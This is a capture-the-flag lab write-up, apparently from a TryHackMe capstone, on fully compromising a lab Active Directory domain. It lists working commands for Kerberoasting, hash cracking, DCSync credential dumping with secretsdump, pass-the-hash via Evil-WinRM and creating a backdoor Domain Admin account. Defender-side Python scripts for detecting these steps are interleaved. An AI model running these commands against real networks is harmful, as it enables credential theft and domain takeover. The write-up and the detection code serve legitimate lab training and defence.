# Full Compromise of CORP Domain

## Used Tools

- sshuttle
- DNSChef
- Bloodhound-python
- neo4j
- Bloodhound
- impacket's GetUserSPNs.py
- Hashcat
- impacket's secretsdump
- Evil-WinRM
- Remmina

## Summary

With the connection previously established through sshuttle it is possible to enumerate the domain with Bloodhound-python without dropping SharpHound on any internal machine. Because of DNS errors, a fake DNS server was set up with DNSChef. Next, we use neo4j with Bloodhound to analyze the results of Bloodhound-python. The first thing that immediately catches the eye is that Administrators and Domain Admins have the capability to perform a dcsync attack. In addition, some Service Principals are kerberoastable. Using impacket's GetUserSPNs.py we obtain the Kerberos hashes of five Service Principals; one of them, the svcScanning account, is crackable with Hashcat. Running Bloodhound again with the more privileged user svcScanning, we find that svcBackups also has the ability to perform a dcsync attack. Hoping to obtain the credentials of svcBackups, whether in clear text or as a hash, we run impacket's secretsdump as svcScanning and retrieve the clear-text credentials of svcBackups. From there we run impacket's secretsdump again, this time as svcBackups, and obtain the hash of the local administrator of the child domain controller corpdc. With this hash we perform a pass-the-hash attack via Evil-WinRM against the child domain controller. There we create our own user 0xb0b, add him to the Domain Admins, and have thereby fully compromised the CORP domain; we can now RDP into the child domain controller with the newly created user.

## Investigation

First, we try to enumerate the domain with Bloodhound-python but receive a DNS error. The same issue occurred when passing the connection through SSH dynamic port forwarding and ProxyChains; in that case `--dns-tcp` has to be used. To get around this problem, a fake DNS server was set up.

{% hint style="info" %}
Using Bloodhound-python with ProxyChains and DNSChef

<https://www.youtube.com/watch?v=4ydjpSSKQ8g>
{% endhint %}

<figure><img src="/files/IWnnJJvIL9GaLGCnJdH9" alt=""><figcaption></figcaption></figure>

Running the following to establish a fake DNS.

<figure><img src="/files/EHWpcZnajhwa0hG47Jks" alt=""><figcaption></figcaption></figure>

This time the command looks a bit different: the nameserver is now our localhost, everything else remains the same, and we are able to enumerate the domain.

```
┌──(0xb0b㉿kali)-[~/Documents/tryhackme/capstone/bloodhound/laura.wood]
└─$ bloodhound-python -d corp.thereserve.loc -u laura.wood -p 'Password1@' -dc corpdc.corp.thereserve.loc -c all -ns 127.0.0.1
```

<figure><img src="/files/9hlmfvJstD6Okd89EsAS" alt=""><figcaption></figcaption></figure>

Let's start neo4j and run Bloodhound to find some interesting stuff on the domain.

<figure><img src="/files/4cO4agZoVgYaB5Z0TEVr" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/7Msl78PT5PdUCYRFPgPS" alt=""><figcaption></figcaption></figure>

Just drop the files into Bloodhound.

<figure><img src="/files/eyujTWzIXKbmrUYkZf7o" alt=""><figcaption></figcaption></figure>

The first thing that catches the eye is that we are able to find groups with the ability to perform dcsync attacks, which might be interesting for the full compromise of the parent domain. In a `dcsync attack`, credentials are harvested by simulating a domain controller that asks another domain controller to replicate its information. This can be accomplished remotely via impacket's `secretsdump.py` or locally by running mimikatz on a victim machine with `lsadump::dcsync`.

{% hint style="info" %}
<https://tryhackme.com/room/persistingad> Persistence through Credentials
{% endhint %}

<figure><img src="/files/C9I2BOsKf8K7pfAjhxah" alt=""><figcaption></figcaption></figure>

Administrators and Domain Admins are able to perform a `dcsync` attack.
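As an added defender-side example (not code from this writeup, nor from BloodHound or impacket), the script below does two things with the finding above: it audits a simplified view of the domain object's DACL for principals that hold both replication rights, which is the edge BloodHound labels DCSync, and it flags 4662 events in which anyone other than a DC machine account exercises one of those rights. The ACEs, the events, the baseline group set and the `CORP\CORPDC$` allowlist are constructed assumptions for this example.

```python
# Added example (not the writeup's code): audit which principals hold the
# replication rights that make DCSync possible, and flag 4662 events where a
# principal other than a domain controller exercises them. All ACEs and
# events below are constructed sample data.
from typing import Dict, Iterable, List, Set, Tuple

# Extended-right GUIDs on the domain object that replication (DCSync) requires.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# Principals that hold both rights by default and are expected to keep them
# (assumption: this is the full baseline for the CORP domain).
BASELINE_HOLDERS = {
    "CORP\\Administrators",
    "CORP\\Domain Admins",
    "CORP\\Domain Controllers",
    "CORP\\Enterprise Domain Controllers",
}
# Machine accounts that legitimately replicate (assumption: corpdc is the only DC).
DC_ACCOUNTS = {"CORP\\CORPDC$"}


def dcsync_capable(aces: Iterable[Tuple[str, str]]) -> List[str]:
    """Trustees holding both GetChanges and GetChangesAll on the domain object.

    `aces` is a simplified DACL view: (trustee, extended-right GUID). Holding
    both rights is what lets an account pull secrets the way a DC would.
    """
    held: Dict[str, Set[str]] = {}
    for trustee, right in aces:
        held.setdefault(trustee, set()).add(right.lower())
    return sorted(t for t, rights in held.items() if REPLICATION_RIGHTS <= rights)


def unexpected_dcsync_capable(aces: Iterable[Tuple[str, str]]) -> List[str]:
    """DCSync-capable trustees outside the baseline: each one needs a justification."""
    return [t for t in dcsync_capable(aces) if t not in BASELINE_HOLDERS]


def replication_by_non_dc(events: Iterable[dict]) -> List[dict]:
    """4662 records where a non-DC principal used a replication right."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        # 4662 lists the accessed rights as '{guid}' lines in Properties.
        props = ev.get("Properties", "").lower()
        if not any(g in props for g in REPLICATION_RIGHTS):
            continue
        subject = f"{ev['SubjectDomainName']}\\{ev['SubjectUserName']}"
        if subject not in DC_ACCOUNTS:
            hits.append({"subject": subject, "computer": ev.get("Computer")})
    return hits


# Constructed DACL snapshot of the domain object (not real data).
SAMPLE_ACES = [
    ("CORP\\Domain Admins", DS_REPLICATION_GET_CHANGES),
    ("CORP\\Domain Admins", DS_REPLICATION_GET_CHANGES_ALL),
    ("CORP\\Administrators", DS_REPLICATION_GET_CHANGES),
    ("CORP\\Administrators", DS_REPLICATION_GET_CHANGES_ALL),
    ("CORP\\Domain Controllers", DS_REPLICATION_GET_CHANGES),
    ("CORP\\Domain Controllers", DS_REPLICATION_GET_CHANGES_ALL),
    ("CORP\\svcBackups", DS_REPLICATION_GET_CHANGES),
    ("CORP\\svcBackups", DS_REPLICATION_GET_CHANGES_ALL),
    ("CORP\\laura.wood", DS_REPLICATION_GET_CHANGES),  # one right only: no DCSync
]

# Constructed Security-log records (only the fields this check needs).
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectDomainName": "CORP", "SubjectUserName": "CORPDC$",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
     "Computer": "corpdc.corp.thereserve.loc"},
    {"EventID": 4662, "SubjectDomainName": "CORP", "SubjectUserName": "svcBackups",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
     "Computer": "corpdc.corp.thereserve.loc"},
    {"EventID": 4662, "SubjectDomainName": "CORP", "SubjectUserName": "laura.wood",
     "Properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}",  # some other object GUID, not a replication right
     "Computer": "corpdc.corp.thereserve.loc"},
    {"EventID": 4624, "SubjectDomainName": "CORP", "SubjectUserName": "laura.wood"},
]

if __name__ == "__main__":
    print("DCSync-capable:", dcsync_capable(SAMPLE_ACES))
    print("Outside baseline:", unexpected_dcsync_capable(SAMPLE_ACES))
    print("Replication by non-DC:", replication_by_non_dc(SAMPLE_EVENTS))
```

The DACL check is the preventive half (the same question BloodHound answers, run as a recurring audit), and the 4662 check only works if "Directory Service Access" auditing is enabled on the domain controllers and the domain object has a SACL for the replication rights; without that, the event is never written.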

<figure><img src="/files/pIGnhJwNVCCwmmAmFLzx" alt=""><figcaption></figcaption></figure>

Running `GetUserSPNs.py` to get information about the ServicePrincipalNames, in the hope of obtaining a more privileged user.

```
┌──(0xb0b㉿kali)-[~/Documents/tryhackme/capstone]
└─$ /usr/share/doc/python3-impacket/examples/GetUserSPNs.py corp.thereserve.loc/laura.wood:"Password1@" -dc-ip 10.200.103.102 -request
```

Here we have the hashes of `svcBackups`, `svcEDR`, `svcMonitor`, `svcScanning` and `svcOctober`.

<figure><img src="/files/y8iux9mnSvgDYbYkdYj7" alt=""><figcaption></figcaption></figure>

Trying to crack the hashes gives us the credentials `svcScanning:Password1`.

We chose to use mode 13100 for cracking Kerberos 5, etype 23, TGS-REP hashes.
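An added detection example, not part of this writeup: the RC4 (etype 23) service tickets that mode 13100 cracks are also what the domain controller records in event 4769, so the script below flags clients that pull RC4 tickets for several user service accounts in a burst and lists the accounts that should be moved to AES. The client addresses, the `_tgs` helper and every event are constructed for this example.

```python
# Added example (not the writeup's code): spot Kerberoasting in event 4769
# (Kerberos service ticket requested). Tickets issued with RC4 (etype 0x17 = 23)
# are the ones hashcat mode 13100 cracks offline. Events are constructed.
from collections import defaultdict
from typing import Dict, Iterable, List

RC4_HMAC = "0x17"               # etype 23: crackable offline from the TGS-REP
AES_ETYPES = {"0x11", "0x12"}   # AES128 / AES256: where service accounts should be


def is_roastable_request(ev: dict) -> bool:
    """Successful RC4 service ticket for a user (not machine) service account."""
    if ev.get("EventID") != 4769 or ev.get("Status") != "0x0":
        return False
    svc = ev.get("ServiceName", "")
    if svc.lower() == "krbtgt" or svc.endswith("$"):
        return False  # TGTs and computer-account tickets are not the roaster's target
    return ev.get("TicketEncryptionType", "").lower() == RC4_HMAC


def roasting_bursts(events: Iterable[dict], threshold: int = 3) -> Dict[str, List[str]]:
    """Clients that pulled RC4 tickets for at least `threshold` distinct service accounts.

    One client requesting tickets for many SPN-bearing accounts in a row is the
    signature of a bulk request such as GetUserSPNs.py -request.
    """
    by_client: Dict[str, set] = defaultdict(set)
    for ev in events:
        if is_roastable_request(ev):
            by_client[ev["IpAddress"]].add(ev["ServiceName"])
    return {ip: sorted(s) for ip, s in by_client.items() if len(s) >= threshold}


def accounts_to_move_to_aes(events: Iterable[dict]) -> List[str]:
    """Service accounts still issuing RC4 tickets: candidates for an AES-only
    msDS-SupportedEncryptionTypes setting and a long, random password."""
    return sorted({ev["ServiceName"] for ev in events if is_roastable_request(ev)})


def _tgs(client: str, service: str, etype: str, status: str = "0x0") -> dict:
    """Build a minimal constructed 4769 record."""
    return {"EventID": 4769, "IpAddress": client, "ServiceName": service,
            "TicketEncryptionType": etype, "Status": status,
            "TargetUserName": "laura.wood@CORP.THERESERVE.LOC"}


# Constructed: one client requests RC4 tickets for five service accounts in a
# burst; the rest is ordinary traffic (AES tickets, a TGT, a failed request).
ATTACKER = "::ffff:10.50.1.2"   # placeholder address, not from the writeup
SAMPLE_EVENTS = [
    _tgs(ATTACKER, "svcBackups", "0x17"),
    _tgs(ATTACKER, "svcEDR", "0x17"),
    _tgs(ATTACKER, "svcMonitor", "0x17"),
    _tgs(ATTACKER, "svcScanning", "0x17"),
    _tgs(ATTACKER, "svcOctober", "0x17"),
    _tgs("::ffff:10.200.103.11", "WRK1$", "0x12"),       # workstation ticket, AES
    _tgs("::ffff:10.200.103.11", "svcMonitor", "0x12"),  # single AES request: fine
    _tgs("::ffff:10.200.103.11", "krbtgt", "0x12"),
    _tgs("::ffff:10.200.103.12", "svcEDR", "0x17", status="0x1b"),  # failed request
]

if __name__ == "__main__":
    print("Bursts:", roasting_bursts(SAMPLE_EVENTS))
    print("Move to AES:", accounts_to_move_to_aes(SAMPLE_EVENTS))
```

The threshold is deliberately low because a legitimate client rarely needs tickets for several unrelated service accounts within one log window; tune it against your own 4769 volume. A service account whose password survives a wordlist attack, or which only ever issues AES tickets, still shows up in 4769 but gives the attacker nothing to crack in reasonable time.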

<figure><img src="/files/8BcZFqPoE7qbY6yOMSsz" alt=""><figcaption></figcaption></figure>

Next, we repeat the bloodhound enumeration, this time with `svcScanning`.

```
┌──(0xb0b㉿kali)-[~/Documents/tryhackme/capstone/bloodhound/svcScanning]
└─$ bloodhound-python -d corp.thereserve.loc -u svcScanning -p 'Password1!' -dc corpdc.corp.thereserve.loc -c all -ns 127.0.0.1
```

<figure><img src="/files/CUeiC1SHprHEGHUxGNWk" alt=""><figcaption></figcaption></figure>

After deleting the database and resetting the database stats, we drop the results of `svcScanning` in.

<figure><img src="/files/vz0b7OYTqZeVuIB8pONj" alt=""><figcaption></figcaption></figure>

Checking the `shortest path to high value targets` reveals that the user `svcBackups` also has the capability to perform a `dcsync` attack.

<figure><img src="/files/hcIkbJBI9aoaNVgbJCMz" alt=""><figcaption><p>Bloodhound: Shortest Path to High Value Targets</p></figcaption></figure>

<figure><img src="/files/H0OzGIHuHN0dNUrZm7Sg" alt=""><figcaption><p>Bloodhound: Node Info svcBackups - Reachable High Value Targets</p></figcaption></figure>

Running `impacket-secretsdump` as the user `svcScanning`, in the hope of obtaining credentials of `svcBackups` or another high-value target.

```
┌──(0xb0b㉿kali)-[~/Documents/tryhackme/capstone]
└─$ impacket-secretsdump corp.thereserve.loc/svcScanning:'Password1!'@10.200.103.31
```

<figure><img src="/files/AVjaIZtr1RWSdOEcW7BH" alt=""><figcaption></figcaption></figure>

`svcBackups@corp.thereserve.loc:q9nzssaFtGHdqUV3Qv6G`

And we get the credentials of `svcBackups`, the user with `dcsync` capabilities.

With this user we run `impacket-secretsdump` again and are able to retrieve the local Administrator hash.

```
┌──(0xb0b㉿kali)-[~/Documents/tryhackme/capstone]
└─$ impacket-secretsdump corp.thereserve.loc/svcBackups:q9nzssaFtGHdqUV3Qv6G@10.200.103.102
```

<figure><img src="/files/9se8rP9GjiAqZ3236fUe" alt=""><figcaption></figcaption></figure>

Using Evil-WinRM and a pass-the-hash attack, we are able to connect directly to the child domain controller corpdc.

```
┌──(0xb0b㉿kali)-[~/Documents/tryhackme/capstone]
└─$ evil-winrm -u Administrator -H d3d4edcc015856e386074795aea86b3e -i 10.200.103.102
```

Running the following commands to add our own user and make him a member of the Domain Admins.

```
New-ADUser 0xb0b
Add-ADGroupMember -Identity 'Domain Admins' -Members 0xb0b
Set-ADAccountPassword -Identity 0xb0b -NewPassword (ConvertTo-SecureString -AsPlainText "WhoKnows1337Me?" -Force)
Enable-ADAccount -Identity '0xb0b'
```
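From the defender's side, the four commands above leave a very recognisable trail in the Security log: a 4720 (user created), a 4728 (member added to a security-enabled global group) naming Domain Admins, and a 4722 (account enabled) within seconds of each other. The script below, an added example that is not part of the writeup, surfaces every addition to a privileged group for review and raises an alert when the added member was itself created minutes earlier. The group list, the time window and all event records are constructed assumptions.

```python
# Added example (not the writeup's code): correlate Security events for the
# "create a user and make it Domain Admin" step. Any addition to a privileged
# group deserves a review; one whose member was created (4720) minutes earlier
# is an alert. All events below are constructed sample data.
from datetime import datetime, timedelta
from typing import Iterable, List

# Assumption: the groups this domain treats as Tier 0 (extend as needed).
PRIVILEGED_GROUPS = {"domain admins", "enterprise admins", "schema admins", "administrators"}
# 4728 = global group, 4732 = domain-local group, 4756 = universal group.
GROUP_ADD_EVENTS = (4728, 4732, 4756)
CREATE_TO_PRIV_WINDOW = timedelta(minutes=15)


def member_from_dn(member_name: str) -> str:
    """'CN=0xb0b,CN=Users,DC=corp,...' -> '0xb0b'; plain names pass through."""
    first = member_name.split(",", 1)[0]
    return first[3:] if first.upper().startswith("CN=") else first


def privileged_additions(events: Iterable[dict]) -> List[dict]:
    """Every group-membership addition whose target group is privileged."""
    out = []
    for ev in events:
        if ev["EventID"] in GROUP_ADD_EVENTS and ev["TargetUserName"].lower() in PRIVILEGED_GROUPS:
            out.append({"member": member_from_dn(ev["MemberName"]),
                        "group": ev["TargetUserName"],
                        "by": ev["SubjectUserName"],
                        "time": ev["TimeCreated"]})
    return out


def new_account_made_privileged(events: Iterable[dict],
                                window: timedelta = CREATE_TO_PRIV_WINDOW) -> List[dict]:
    """Privileged additions whose member was created less than `window` earlier."""
    events = list(events)
    created = {ev["TargetUserName"].lower(): datetime.fromisoformat(ev["TimeCreated"])
               for ev in events if ev["EventID"] == 4720}
    hits = []
    for add in privileged_additions(events):
        t_created = created.get(add["member"].lower())
        if t_created is None:
            continue
        delta = datetime.fromisoformat(add["time"]) - t_created
        if timedelta(0) <= delta <= window:
            hits.append({**add, "created": t_created.isoformat(),
                         "seconds_after_create": int(delta.total_seconds())})
    return hits


# Constructed records (field names follow the Security log; values are sample data).
SAMPLE_EVENTS = [
    {"EventID": 4720, "TimeCreated": "2023-05-01T10:00:00", "SubjectUserName": "Administrator",
     "TargetUserName": "0xb0b"},
    {"EventID": 4728, "TimeCreated": "2023-05-01T10:00:20", "SubjectUserName": "Administrator",
     "TargetUserName": "Domain Admins",
     "MemberName": "CN=0xb0b,CN=Users,DC=corp,DC=thereserve,DC=loc"},
    {"EventID": 4722, "TimeCreated": "2023-05-01T10:00:45", "SubjectUserName": "Administrator",
     "TargetUserName": "0xb0b"},
    {"EventID": 4728, "TimeCreated": "2023-05-01T10:05:00", "SubjectUserName": "it.admin",
     "TargetUserName": "Helpdesk",
     "MemberName": "CN=new.hire,CN=Users,DC=corp,DC=thereserve,DC=loc"},
    {"EventID": 4728, "TimeCreated": "2023-05-01T11:30:00", "SubjectUserName": "it.admin",
     "TargetUserName": "Domain Admins",
     "MemberName": "CN=it.ops,CN=Users,DC=corp,DC=thereserve,DC=loc"},
]

if __name__ == "__main__":
    for add in privileged_additions(SAMPLE_EVENTS):
        print("review:", add)
    for hit in new_account_made_privileged(SAMPLE_EVENTS):
        print("ALERT:", hit)
```

Both checks need "Audit User Account Management" and "Audit Security Group Management" enabled on the domain controllers; the second one also points at the actor, which here is the built-in Administrator logged on over WinRM with a hash rather than a password, another detail worth correlating with the 4624 logon type and authentication package on corpdc.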

<figure><img src="/files/jeITZY4NxucOcg5RXoHH" alt=""><figcaption></figcaption></figure>

Next we use Remmina to connect to the domain controller as 0xb0b.

<figure><img src="/files/88plFAB1E8ON5r8AUSwf" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/BmdftcbrvYHvRIISkG5z" alt=""><figcaption></figcaption></figure>

Connected to the domain controller as our user, we are able to start the command line as administrator. From there we can reach every machine in the corp domain and place our proofs of compromise at the given locations to retrieve the flags.

<figure><img src="/files/tSkhik13mVF24EUwZqqi" alt=""><figcaption></figcaption></figure>

## Flag-4: Administrative access to Corporate Division Tier 2 Infrastructure

```
echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > \\wrk1.corp.thereserve.loc\c$\Users\Administrator\0xb0b.txt
```

## Flag-5: Foothold on Corporate Division Tier 1 Infrastructure

```
echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > \\server1.corp.thereserve.loc\c$\Windows\Temp\0xb0b.txt
```

## Flag-6: Administrative access to Corporate Division Tier 1 Infrastructure

```
echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > \\server1.corp.thereserve.loc\c$\Users\Administrator\0xb0b.txt
```

## Flag-7: Foothold on Corporate Division Tier 0 Infrastructure

```
echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > \\corpdc.corp.thereserve.loc\c$\Windows\Temp\0xb0b.txt
```

## Flag-8: Administrative access to Corporate Division Tier 0 Infrastructure

```
echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > \\corpdc.corp.thereserve.loc\c$\Users\Administrator\0xb0b.txt
```
